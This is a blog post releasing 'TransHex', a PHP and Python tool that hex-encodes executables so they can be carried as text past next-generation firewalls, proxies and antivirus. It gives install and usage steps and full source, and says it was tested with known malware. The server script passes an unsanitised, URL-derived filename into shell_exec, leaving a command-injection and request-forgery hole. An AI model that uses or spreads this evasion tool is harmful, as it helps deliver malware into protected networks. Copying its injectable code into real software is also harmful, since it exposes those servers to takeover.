Summary

We have all faced the problem of transferring “malicious” or binary files through corporate firewalls or proxies when doing penetration tests.  Previously the work around was quite easy.  FTP, SSL, and SSH tunneling (the list goes on) provided a quick and easy way to bring whatever tools a penetration tester needed into the environment.  Edge technologies have now matured and these simple techniques are no longer working mainly due to next generation firewalls with application ID.  So how do you get around this?  Go old school to beat new school tech!

The general idea we had before writing the very rough first release of TransHex was AV does not scan hex in text files.  So how to beat the application ID portion of the nexgen firewalls?  Easy, you don’t.  We initially wrote the program completely in python as a client server app and we were quickly blocked by nexgen firewalls.  So if you can’t beat them, join them.  The app was ported to a web server and bingo bango we were transferring files through multiple nexgen firewalls without being detected.

So here is a quick breakdown on how TransHex works.

  • The attacker/pentester goes to the web app that would be loaded on a public server
  • The attacker/pentester requests an exe that is available on a different publicly available server and submits to the application
  • TransHex at this point downloads the exe and saves it to [web path]/hex/[filename]
  • Once the download is complete a python script is ran that converts the binary file to a single hex string
  • The hex string is written to a new text file in [web path]/hex/[filename]
  • The attacker/pentester then goes back to the main page of the application by clicking continue
  • The new text file is now listed on the first page
  • The attacker/pentester then saves the text file to the local machine using the internet browser
  • On the local machine the attacker/pentester converts the text file with the hex string to a binary using the python client script

Application Notes

This application is provided as is.  NO support is offered for this application and essentialexploit.com is NOT liable for any damage this application may cause.  Essentialexploit.com is also NOT liable for any misuse of this application or the use of this application for illegal purposes.

Features that need to be added

  • Error handling
  • Help/man pages
  • Request hex conversion of local (server side) executables
  • Hex string obfuscation

Limitations and Testing

  • Max file size tested with 115KB
  • File types tested Zip and exe, windows files and known malware
  • Tested through multiple nexgen firewalls and proxies
  • Must have python loaded on the client machine or
    Transfer the client as an exe to the client by other means
  • Tested on Kali Linux (3.7-trunk-686-pae #1 AMP Debian 3.7.0.2-0+kali5 i686 GNU/Linux)
  • The server application is NOT meant to be secure!  You must wrap your own security around the application

Installation (on Fresh install of Kali Linux)

SERVER SIDE

  1. Download the TransHex package from here (MD5:A38EB881A4708FD474D858680648E611 SHA1:10E0066CEF1B95CF77498347D21DFCBB15CA7D5F)
  2. Extract the files from the package
  3. Delete /var/www/index.html
  4. Copy contents of the Server folder from the package to /var/www/
  5. Ensure permissions are correct on the files (again this is NOT a secure app)
    1. chmod 755 TransHex_BIN_to_TXT.py
    2. chmod 644 index.php
    3. chmod 644 getfile.php
    4. chmod 777 hex
    5. Run – service apache2 start
    6. Go to http://127.0.0.1 and the page should now be live

CLIENT SIDE

  1. Somehow get the file TransHex_TXT_to_BIN.py to a client on the inside of the network (needs python installed)
  2. OR convert the file TransHex_TXT_to_BIN.py to a PE and get it to a client on the inside of the network

Usage

  1. Locate the URL of the exe that you wish to download (also works with archive files)
  2. From the client on the inside of the network open a browser and go to your server
    hopefully the URL isn’t blocked
  3. Enter the URL of the exe into the text field and click “Go Get It!”
  4. Wait for the page to load.  There is no progress bar and with large files or slow connections PHP settings may have to be changed on the server
  5. Once the page loads click “continue …”
  6. You will now see your text file in the list
  7. Right click the hyperlink of the text file and select “Save Link As…”
  8. Save the text file to the same location that the TransHex_TXT_to_BIN.py file is
  9. Open a command shell on the client
  10. Navigate to the path were TransHex_TXT_to_BIN.py is located
  11. Run – python TransHex_TXT_to_BIN.py [text file name] [new binary file name]

Conclusion

Based on a very simple idea TransHex is able to defeat very sophisticated technology.  It is obviously limited to being able to get the client into the internal network and being able to execute it.

This trick has worked since I started using it back about 5 or 6 years ago and continues to work today.  Edge technology may never be able to pick up on this as signatures would have to be made for ASCII text and compared to binary signatures or some other means would have to be created.  So have fun with it and as always don’t be stupid and break the law.

Images

Installation Permissions
www_perm

Main Server Page
server

Usage Images
usage_01
usage_02
usage_03
usage_04
usage_05

Files

***Download the TransHex package (MD5:A38EB881A4708FD474D858680648E611 SHA1:10E0066CEF1B95CF77498347D21DFCBB15CA7D5F), as the plugin that is used to show code usually screws  up the source and it may not work***

index.php

<html>
<head><title>TransHex by EssentialExploit.com</title></head>
<body>
 
<h1>TransHex Web Server</h1>
<p><h3>Download New File To Hex</h3></p>
<p><form action="getfile.php">
Enter URL of the Binary: <input type="text" name="urlinput" value="http://">&nbsp;&nbsp;<input type="submit" value="Go Get It!">
</form></p>
 
<p><h3>Browse and Download Hex Files</h3></p>
<p>
<?php
if ($handle = opendir('hex/')) {
    while (false !== ($file = readdir($handle)))
    {
        if ($file != "." && $file != ".." && strtolower(substr($file, strrpos($file, '.') + 1)) == 'txt')
        {
            $thelist .= '<li><a href="hex/'.$file.'">'.$file.'</a></li>';
        }
    }
    closedir($handle);
}
?>
<ul>
<?=$thelist?>
</ul>
</p>
 
<p><form action="/"><input type="submit" value="Refresh Page"></form></p>
 
</body>
</html>

getfile.php

<html>
<head><title>TransHex by EssentialExploit.com</title></head>
<body>
 
<h1>TransHex Web Server</h1>
<p><h3>Progress</h3></p>
<?php
 
$url = $_GET["urlinput"];
$filename = $url;
 
 
$filename = explode("/", $filename);
$filename = end($filename);
$filenameandpath = "hex/" . $filename;
$TXTFILE = explode(".", $filename);
$TXTFILE = $TXTFILE[0];
$TXTFILE = $TXTFILE . ".txt";
$TXTFILEandpath = "hex/" . $TXTFILE;
 
//$DelFilePath = $setup["serverWebrootPath"] . $filenameandpath;
if (file_exists($filenameandpath)) { unlink ($filenameandpath); }
if (file_exists($TXTFILEandpath)) { unlink ($TXTFILEandpath); }
 
echo "The file " . $url . " is being downloaded. <br>";
file_put_contents($filenameandpath, file_get_contents($url));
echo "The file " . $filename . " has been downloaded. <br>Starting to convert to hex.<br>";
 
$execString = "python TransHex_BIN_to_TXT.py " . $filenameandpath . " hex/" . $TXTFILE;
$output = shell_exec($execString);
print "All Done ... I hope."
 
?>
 
<p><form action="/"><input type="submit" value="Continue ..."></form></p>
 
</body>
</html>

TransHex_BIN_to_TXT.py

'''
TransHex_BIN_to_TXT.py
Created on June 19, 2013
@author: Essential Exploit Labs
'''
import sys, os, socket, binascii
 
BINFILE = sys.argv[1]
TXTFILE = sys.argv[2]
 
# Function to create the new text or binary file
def make_file (file_name):
	newfile = open(file_name, 'w')
	newfile.write('')
	newfile.close()
 
	return
 
# Function to convert a binary file to a text file with a hex string
def bin_to_txt ():
	print BINFILE
	with open(BINFILE,"rb") as file:
		content = file.read()
 
	if os.path.exists(TXTFILE):
		os.remove(TXTFILE)
 
	make_file(TXTFILE)
	outputfile = open(TXTFILE,'w')
	outputfile.write((binascii.hexlify(content)))
	outputfile.close()
 
	return
 
# Start the main program
bin_to_txt()

TransHex_TXT_to_BIN.py

'''
TransHex_Client.py
Created on June 19, 2013
@author: Essential Exploit Labs
'''
import sys, os, socket, binascii
 
BINFILE = sys.argv[2]
TXTFILE = sys.argv[1]
 
# Function to create the new text or binary file
def make_file (file_name):
	newfile = open(file_name, 'w')
	newfile.write('')
	newfile.close()
	return
 
# Function to convert a text file with a hex string to a binary file
def txt_to_bin (filename):
	with open(TXTFILE,"r") as inputfile:
		content = inputfile.read()
 
	if os.path.exists(filename):
		os.remove(filename)
 
	make_file(filename)
	outputfile = open(filename,'wb')
	outputfile.write((binascii.unhexlify(content)))
	outputfile.close()
 
	print 'Binary file has been created'
 
	return
 
# Start the main program
if os.path.exists(BINFILE):
	os.remove(BINFILE)
txt_to_bin(BINFILE)

No Comments Yet.

Leave a Comment

You must be logged in to post a comment.